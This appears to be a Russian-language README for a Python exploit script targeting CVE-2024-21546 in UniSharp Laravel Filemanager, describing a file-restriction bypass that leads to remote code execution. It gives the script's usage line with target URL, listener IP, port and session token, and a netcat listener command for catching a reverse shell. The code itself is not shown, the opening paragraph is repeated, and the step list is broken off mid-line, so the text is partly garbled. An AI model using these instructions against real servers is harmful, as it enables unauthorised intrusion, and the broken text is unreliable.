
Этот Python-скрипт эксплойта нацелен на уязвимый Laravel Filemanager, созданный UniSharp, который позволяет аутентифицированным пользователям обходить ограничения на файлы и загружать вредоносные файлы. Это может привести к удаленному выполнению кода (RCE) при активации загруженной полезной нагрузки.
Этот скрипт эксплойта на Python нацелен на уязвимый Laravel Filemanager, созданный UniSharp, который позволяет аутентифицированным пользователям обходить ограничения на файлы и загружать вредоносные файлы. Это может привести к удаленному выполнению кода (RCE) при активации загруженной полезной нагрузки.
Эксплойт выполняет следующие действия:
laravel_session_token с помощью регулярного выраженияВерсия 2.9.1 и более ранние
python3 CVE-2024-21546.py <target_url> <listener_ip> <listener_port> <laravel_session>
Важно: Запустите ваш слушатель перед запуском скрипта:
nc -lvnp <listener_port>
